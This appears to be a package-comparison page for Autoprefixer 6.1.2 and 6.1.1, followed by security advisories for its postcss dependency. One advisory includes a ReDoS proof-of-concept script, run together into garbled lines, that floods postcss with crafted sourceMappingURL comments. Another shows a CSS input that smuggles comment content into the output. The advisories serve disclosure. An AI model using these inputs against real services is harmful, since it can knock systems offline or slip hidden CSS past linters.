Autoprefixer, a vital tool for modern web development, automatically adds vendor prefixes to your CSS, ensuring compatibility across different browsers. Comparing versions 6.1.2 and 6.1.1, subtle but important distinctions emerge. Both versions rely on PostCSS for parsing and manipulating CSS and offer a smooth workflow through various build systems. Version 6.1.2, released on November 30, 2015, builds upon its predecessor (released a week before, on November 23) primarily by updating the caniuse-db dependency to version ^1.0.30000372. This update is critical because caniuse-db provides the data regarding browser support for various CSS features. Therefore, 6.1.2 offers more accurate and up-to-date prefixing based on the latest browser landscape compared to 6.1.1 which uses caniuse-db version ^1.0.30000367. For developers, this translates to improved cross-browser compatibility and reduced effort in manually managing vendor prefixes. The core functionality remains consistent, allowing for seamless upgrades. Both versions share the same development dependencies, ensuring a familiar environment for contributors. Upgrading to 6.1.2 is recommended to leverage the most current browser support data, resulting in better and more reliable CSS prefixing for your projects.
All the vulnerabilities related to the version 6.1.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.